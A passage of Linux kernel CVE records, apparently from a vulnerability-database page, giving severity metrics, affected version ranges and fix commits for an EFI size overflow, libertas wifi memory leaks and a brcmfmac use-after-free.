"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26843",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-12T17:35:21.799610Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-06T19:39:21.403Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.673Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4fff3d735baea104017f2e3c245e27cdc79f2426"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4aa36b62c3eaa869860bf78b1146e9f2b5f782a9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/700c3f642c32721f246e09d3a9511acf40ae42be"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cf3d6813601fe496de7f023435e31bfffa74ae70"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/156cb12ffdcf33883304f0db645e1eadae712fe0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/de1034b38a346ef6be25fe8792f5d1e0684d5ff4"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/firmware/efi/arm-runtime.c",
"drivers/firmware/efi/riscv-runtime.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4fff3d735baea104017f2e3c245e27cdc79f2426",
"status": "affected",
"version": "16993c0f0a43213e23666ea40e9163887f593ac7",
"versionType": "git"
},
{
"lessThan": "4aa36b62c3eaa869860bf78b1146e9f2b5f782a9",
"status": "affected",
"version": "16993c0f0a43213e23666ea40e9163887f593ac7",
"versionType": "git"
},
{
"lessThan": "700c3f642c32721f246e09d3a9511acf40ae42be",
"status": "affected",
"version": "16993c0f0a43213e23666ea40e9163887f593ac7",
"versionType": "git"
},
{
"lessThan": "cf3d6813601fe496de7f023435e31bfffa74ae70",
"status": "affected",
"version": "16993c0f0a43213e23666ea40e9163887f593ac7",
"versionType": "git"
},
{
"lessThan": "156cb12ffdcf33883304f0db645e1eadae712fe0",
"status": "affected",
"version": "16993c0f0a43213e23666ea40e9163887f593ac7",
"versionType": "git"
},
{
"lessThan": "de1034b38a346ef6be25fe8792f5d1e0684d5ff4",
"status": "affected",
"version": "16993c0f0a43213e23666ea40e9163887f593ac7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/firmware/efi/arm-runtime.c",
"drivers/firmware/efi/riscv-runtime.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.5"
},
{
"lessThan": "5.5",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nefi: runtime: Fix potential overflow of soft-reserved region size\n\nmd_size will have been narrowed if we have \u003e= 4GB worth of pages in a\nsoft-reserved region."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-21T09:12:32.297Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/4fff3d735baea104017f2e3c245e27cdc79f2426"
},
{
"url": "https://git.kernel.org/stable/c/4aa36b62c3eaa869860bf78b1146e9f2b5f782a9"
},
{
"url": "https://git.kernel.org/stable/c/700c3f642c32721f246e09d3a9511acf40ae42be"
},
{
"url": "https://git.kernel.org/stable/c/cf3d6813601fe496de7f023435e31bfffa74ae70"
},
{
"url": "https://git.kernel.org/stable/c/156cb12ffdcf33883304f0db645e1eadae712fe0"
},
{
"url": "https://git.kernel.org/stable/c/de1034b38a346ef6be25fe8792f5d1e0684d5ff4"
}
],
"title": "efi: runtime: Fix potential overflow of soft-reserved region size",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26843",
"datePublished": "2024-04-17T10:10:08.089Z",
"dateReserved": "2024-02-19T14:20:24.182Z",
"dateUpdated": "2025-05-21T09:12:32.297Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35828 (GCVE-0-2024-35828)
Vulnerability from cvelistv5
Published
2024-05-17 13:41
Modified
2025-05-04 09:06
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
wifi: libertas: fix some memleaks in lbs_allocate_cmd_buffer()
In the for statement of lbs_allocate_cmd_buffer(), if the allocation of
cmdarray[i].cmdbuf fails, both cmdarray and cmdarray[i].cmdbuf needs to
be freed. Otherwise, there will be memleaks in lbs_allocate_cmd_buffer().
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 876c9d3aeb989cf1961f2c228d309ba5dcfb1172 Version: 876c9d3aeb989cf1961f2c228d309ba5dcfb1172 Version: 876c9d3aeb989cf1961f2c228d309ba5dcfb1172 Version: 876c9d3aeb989cf1961f2c228d309ba5dcfb1172 Version: 876c9d3aeb989cf1961f2c228d309ba5dcfb1172 Version: 876c9d3aeb989cf1961f2c228d309ba5dcfb1172 Version: 876c9d3aeb989cf1961f2c228d309ba5dcfb1172 Version: 876c9d3aeb989cf1961f2c228d309ba5dcfb1172 Version: 876c9d3aeb989cf1961f2c228d309ba5dcfb1172 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35828",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T14:12:48.621996Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:33:51.765Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:47.588Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/96481624fb5a6319079fb5059e46dbce43a90186"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bea9573c795acec5614d4ac2dcc7b3b684cea5bf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f0dd27314c7afe34794c2aa19dd6f2d30eb23bc7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e888c4461e109f7b93c3522afcbbaa5a8fdf29d2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4d99d267da3415db2124029cb5a6d2d955ca43f9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/da10f6b7918abd5b4bc5c9cb66f0fc6763ac48f3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d219724d4b0ddb8ec7dfeaed5989f23edabaf591"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8e243ac649c10922a6b4855170eaefe4c5b3faab"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5f0e4aede01cb01fa633171f0533affd25328c3a"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/marvell/libertas/cmd.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "96481624fb5a6319079fb5059e46dbce43a90186",
"status": "affected",
"version": "876c9d3aeb989cf1961f2c228d309ba5dcfb1172",
"versionType": "git"
},
{
"lessThan": "bea9573c795acec5614d4ac2dcc7b3b684cea5bf",
"status": "affected",
"version": "876c9d3aeb989cf1961f2c228d309ba5dcfb1172",
"versionType": "git"
},
{
"lessThan": "f0dd27314c7afe34794c2aa19dd6f2d30eb23bc7",
"status": "affected",
"version": "876c9d3aeb989cf1961f2c228d309ba5dcfb1172",
"versionType": "git"
},
{
"lessThan": "e888c4461e109f7b93c3522afcbbaa5a8fdf29d2",
"status": "affected",
"version": "876c9d3aeb989cf1961f2c228d309ba5dcfb1172",
"versionType": "git"
},
{
"lessThan": "4d99d267da3415db2124029cb5a6d2d955ca43f9",
"status": "affected",
"version": "876c9d3aeb989cf1961f2c228d309ba5dcfb1172",
"versionType": "git"
},
{
"lessThan": "da10f6b7918abd5b4bc5c9cb66f0fc6763ac48f3",
"status": "affected",
"version": "876c9d3aeb989cf1961f2c228d309ba5dcfb1172",
"versionType": "git"
},
{
"lessThan": "d219724d4b0ddb8ec7dfeaed5989f23edabaf591",
"status": "affected",
"version": "876c9d3aeb989cf1961f2c228d309ba5dcfb1172",
"versionType": "git"
},
{
"lessThan": "8e243ac649c10922a6b4855170eaefe4c5b3faab",
"status": "affected",
"version": "876c9d3aeb989cf1961f2c228d309ba5dcfb1172",
"versionType": "git"
},
{
"lessThan": "5f0e4aede01cb01fa633171f0533affd25328c3a",
"status": "affected",
"version": "876c9d3aeb989cf1961f2c228d309ba5dcfb1172",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/marvell/libertas/cmd.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.22"
},
{
"lessThan": "2.6.22",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"versionStartIncluding": "2.6.22",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "2.6.22",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "2.6.22",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "2.6.22",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "2.6.22",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "2.6.22",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "2.6.22",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "2.6.22",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "2.6.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: libertas: fix some memleaks in lbs_allocate_cmd_buffer()\n\nIn the for statement of lbs_allocate_cmd_buffer(), if the allocation of\ncmdarray[i].cmdbuf fails, both cmdarray and cmdarray[i].cmdbuf needs to\nbe freed. Otherwise, there will be memleaks in lbs_allocate_cmd_buffer()."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:06:18.510Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/96481624fb5a6319079fb5059e46dbce43a90186"
},
{
"url": "https://git.kernel.org/stable/c/bea9573c795acec5614d4ac2dcc7b3b684cea5bf"
},
{
"url": "https://git.kernel.org/stable/c/f0dd27314c7afe34794c2aa19dd6f2d30eb23bc7"
},
{
"url": "https://git.kernel.org/stable/c/e888c4461e109f7b93c3522afcbbaa5a8fdf29d2"
},
{
"url": "https://git.kernel.org/stable/c/4d99d267da3415db2124029cb5a6d2d955ca43f9"
},
{
"url": "https://git.kernel.org/stable/c/da10f6b7918abd5b4bc5c9cb66f0fc6763ac48f3"
},
{
"url": "https://git.kernel.org/stable/c/d219724d4b0ddb8ec7dfeaed5989f23edabaf591"
},
{
"url": "https://git.kernel.org/stable/c/8e243ac649c10922a6b4855170eaefe4c5b3faab"
},
{
"url": "https://git.kernel.org/stable/c/5f0e4aede01cb01fa633171f0533affd25328c3a"
}
],
"title": "wifi: libertas: fix some memleaks in lbs_allocate_cmd_buffer()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35828",
"datePublished": "2024-05-17T13:41:12.702Z",
"dateReserved": "2024-05-17T12:19:12.347Z",
"dateUpdated": "2025-05-04T09:06:18.510Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35811 (GCVE-0-2024-35811)
Vulnerability from cvelistv5
Published
2024-05-17 13:23
Modified
2025-05-04 09:05
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
wifi: brcmfmac: Fix use-after-free bug in brcmf_cfg80211_detach
This is the candidate patch of CVE-2023-47233 :
https://nvd.nist.gov/vuln/detail/CVE-2023-47233
In brcm80211 driver,it starts with the following invoking chain
to start init a timeout worker:
->brcmf_usb_probe
->brcmf_usb_probe_cb
->brcmf_attach
->brcmf_bus_started
->brcmf_cfg80211_attach
->wl_init_priv
->brcmf_init_escan
->INIT_WORK(&cfg->escan_timeout_work,
brcmf_cfg80211_escan_timeout_worker);
If we disconnect the USB by hotplug, it will call
brcmf_usb_disconnect to make cleanup. The invoking chain is :
brcmf_usb_disconnect
->brcmf_usb_disconnect_cb
->brcmf_detach
->brcmf_cfg80211_detach
->kfree(cfg);
While the timeout woker may still be running. This will cause
a use-after-free bug on cfg in brcmf_cfg80211_escan_timeout_worker.
Fix it by deleting the timer and canceling the worker in
brcmf_cfg80211_detach.
[arend.vanspriel@broadcom.com: keep timer delete as is and cancel work just before free]
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: e756af5b30b008f6ffcfebf8ad0b477f6f225b62 Version: e756af5b30b008f6ffcfebf8ad0b477f6f225b62 Version: e756af5b30b008f6ffcfebf8ad0b477f6f225b62 Version: e756af5b30b008f6ffcfebf8ad0b477f6f225b62 Version: e756af5b30b008f6ffcfebf8ad0b477f6f225b62 Version: e756af5b30b008f6ffcfebf8ad0b477f6f225b62 Version: e756af5b30b008f6ffcfebf8ad0b477f6f225b62 Version: e756af5b30b008f6ffcfebf8ad0b477f6f225b62 Version: e756af5b30b008f6ffcfebf8ad0b477f6f225b62 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:47.516Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/202c503935042272e2f9e1bb549d5f69a8681169"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8e3f03f4ef7c36091f46e7349096efb5a2cdb3a1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bacb8c3ab86dcd760c15903fcee58169bc3026aa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8c36205123dc57349b59b4f1a2301eb278cbc731"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0b812f706fd7090be74812101114a0e165b36744"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/190794848e2b9d15de92d502b6ac652806904f5a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6678a1e7d896c00030b31491690e8ddc9a90767a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0a7591e14a8da794d0b93b5d1c6254ccb23adacb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0f7352557a35ab7888bc7831411ec8a3cbe20d78"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35811",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:42:35.275433Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:32:51.552Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "202c503935042272e2f9e1bb549d5f69a8681169",
"status": "affected",
"version": "e756af5b30b008f6ffcfebf8ad0b477f6f225b62",
"versionType": "git"
},
{
"lessThan": "8e3f03f4ef7c36091f46e7349096efb5a2cdb3a1",
"status": "affected",
"version": "e756af5b30b008f6ffcfebf8ad0b477f6f225b62",
"versionType": "git"
},
{
"lessThan": "bacb8c3ab86dcd760c15903fcee58169bc3026aa",
"status": "affected",
"version": "e756af5b30b008f6ffcfebf8ad0b477f6f225b62",
"versionType": "git"
},
{
"lessThan": "8c36205123dc57349b59b4f1a2301eb278cbc731",
"status": "affected",
"version": "e756af5b30b008f6ffcfebf8ad0b477f6f225b62",
"versionType": "git"
},
{
"lessThan": "0b812f706fd7090be74812101114a0e165b36744",
"status": "affected",
"version": "e756af5b30b008f6ffcfebf8ad0b477f6f225b62",
"versionType": "git"
},
{
"lessThan": "190794848e2b9d15de92d502b6ac652806904f5a",
"status": "affected",
"version": "e756af5b30b008f6ffcfebf8ad0b477f6f225b62",
"versionType": "git"
},
{
"lessThan": "6678a1e7d896c00030b31491690e8ddc9a90767a",
"status": "affected",
"version": "e756af5b30b008f6ffcfebf8ad0b477f6f225b62",
"versionType": "git"
},
{
"lessThan": "0a7591e14a8da794d0b93b5d1c6254ccb23adacb",
"status": "affected",
"version": "e756af5b30b008f6ffcfebf8ad0b477f6f225b62",
"versionType": "git"
},
{
"lessThan": "0f7352557a35ab7888bc7831411ec8a3cbe20d78",
"status": "affected",
"version": "e756af5b30b008f6ffcfebf8ad0b477f6f225b62",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.7"
},
{
"lessThan": "3.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: brcmfmac: Fix use-after-free bug in brcmf_cfg80211_detach\n\nThis is the candidate patch of CVE-2023-47233 :\nhttps://nvd.nist.gov/vuln/detail/CVE-2023-47233\n\nIn brcm80211 driver,it starts with the following invoking chain\nto start init a timeout worker:\n\n-\u003ebrcmf_usb_probe\n -\u003ebrcmf_usb_probe_cb\n -\u003ebrcmf_attach\n -\u003ebrcmf_bus_started\n -\u003ebrcmf_cfg80211_attach\n -\u003ewl_init_priv\n -\u003ebrcmf_init_escan\n -\u003eINIT_WORK(\u0026cfg-\u003eescan_timeout_work,\n\t\t brcmf_cfg80211_escan_timeout_worker);\n\nIf we disconnect the USB by hotplug, it will call\nbrcmf_usb_disconnect to make cleanup. The invoking chain is :\n\nbrcmf_usb_disconnect\n -\u003ebrcmf_usb_disconnect_cb\n -\u003ebrcmf_detach\n -\u003ebrcmf_cfg80211_detach\n -\u003ekfree(cfg);\n\nWhile the timeout woker may still be running. This will cause\na use-after-free bug on cfg in brcmf_cfg80211_escan_timeout_worker.\n\nFix it by deleting the timer and canceling the worker in\nbrcmf_cfg80211_detach.\n\n[arend.vanspriel@broadcom.com: keep timer delete as is and cancel work just before free]"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:05:55.989Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/202c503935042272e2f9e1bb549d5f69a8681169"
},
{
"url": "https://git.kernel.org/stable/c/8e3f03f4ef7c36091f46e7349096efb5a2cdb3a1"
},
{
"url": "https://git.kernel.org/stable/c/bacb8c3ab86dcd760c15903fcee58169bc3026aa"
},
{
"url": "https://git.kernel.org/stable/c/8c36205123dc57349b59b4f1a2301eb278cbc731"
},
{
"url": "https://git.kernel.org/stable/c/0b812f706fd7090be74812101114a0e165b36744"
},
{
"url": "https://git.kernel.org/stable/c/190794848e2b9d15de92d502b6ac652806904f5a"
},
{
"url": "https://git.kernel.org/stable/c/6678a1e7d896c00030b31491690e8ddc9a90767a"
},
{
"url": "https://git.kernel.org/stable/c/0a7591e14a8da794d0b93b5d1c6254ccb23adacb"
},
{
"url": "https://git.kernel.org/stable/c/0f7352557a35ab7888bc7831411ec8a3cbe20d78"
}
],
"title": "wifi: brcmfmac: Fix use-after-free bug in brcmf_cfg80211_detach",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
